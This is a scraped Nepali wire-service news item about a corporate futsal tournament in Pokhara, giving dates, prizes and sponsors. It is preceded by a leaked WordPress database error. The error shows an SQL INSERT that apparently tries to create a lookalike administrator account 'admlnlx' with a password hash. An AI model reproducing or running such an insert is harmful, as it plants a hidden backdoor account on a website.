WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYjKpTvjKOXhh7YWyBzyi7QwK.XzTI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 17:32:44', '', 'admlnlx', 'admlnlx')
पोखरा, पुस ६-
खेलकुदको माध्यमबाट पोखराको पर्यटन प्रवद्र्धन गर्ने उद्देश्यले पोखरा न्यूज डटकमले पहिलो पटक संस्थागत फुटसल प्रतियोगिता गर्ने भएको छ ।
‘पर्यटन, खेलकुद र सञ्चार ः पोखरा प्रवद्र्धनको मूल आधार’ भन्ने नाराका साथ यही पुस ९ र १० गते हुने प्रतियोगितामा १२ वटा टिमको सहभागिता रहने आज यहाँ आयोजित पत्रकार सम्मेलनमा पोखरा न्यूज डटकमका सञ्चालक गणेश बरालले जानकारी दिनुभयो ।
उहाँका अनुसार पोखरा फूलबारीस्थित टप कर्नर फुटसलमा हुने प्रतियोगिताका विजयी टिमलाई रु १५ हजार एक, उपविजेतालाई रु १० हजार र तेस्रो हुनेलाई रु पाँच हजार नगदसहित ट्रफी, मेडल र प्रमाणपत्र प्रदान गरिनेछ ।
कार्यक्रम संयोजक दीननाथ बरालले प्रतियोगिता सम्पन्न गर्न रु एक लाख ४५ हजार तीन लाग्ने जानकारी दिँदै प्रतियोगिताको मुख्य प्रायोजन हिमश्री फुड्स प्रालिको उत्पादन रारा तयारी चाउचाउ र कास्कीको माछापुच्छे«्र गाविसमा निर्माणाधीन झ्यामोलोङ हाइडा«ेपावर डेभलपमेन्ट कम्पनीको करुवा हाइड्रोपावरले गरेको छ ।
प्रतियोगिताको सहयोगीकारुपमा पोखरा टे«डिङ कन्सर्न, टपकर्नर फुटसल, पश्चिमान्चल क्षेत्रीय अस्पताल, होटल जलमलह र इकोपानी कम्पनी रहेको बरालले जानकारी दिनुभयो । – रासस